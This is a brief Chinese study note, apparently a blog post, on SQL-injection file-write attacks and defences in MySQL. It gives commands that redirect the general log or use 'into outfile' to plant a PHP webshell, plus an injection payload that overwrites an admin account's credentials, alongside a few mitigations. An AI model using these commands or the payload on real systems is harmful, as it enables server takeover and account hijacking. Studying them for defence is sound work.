sql注入文件写入攻防的学习心得

第一种方式

cd C:\phpStudy\PHPTutorial\MySQL\bin
mysql -hlocalhost -uroot -proot
set global general_log=on;
set global general_log_file='C:\\Users\\Administrator\\Desktop\\conf\\shell.php';
select  "";//一句话木马，用中国菜刀连接
set global general_log=off;
//导出文件后缀为.php，php在执行此文件时，只有中间的代码会被执行，其他内容按html输出，不影响php执行一句话代码
//最根本解决方法有
//1，定期修改mysql密码
//2，检查提交页面数据过滤
//3，添加php_suhosin.dll扩展禁止eval();执行,windows下此方式实现有难度。
//111');UPDATE zd_admin SET name='admin',password='admin' where id = 1; select * from zd_admin where (name='3333

第二种方式

select * from admin into outfile 'C:\\phpStudy\\PHPTutorial\\other\\shell.php';

在此，强烈谴责通过科技手段，进行违法犯罪活动的人，你都不配做一个人！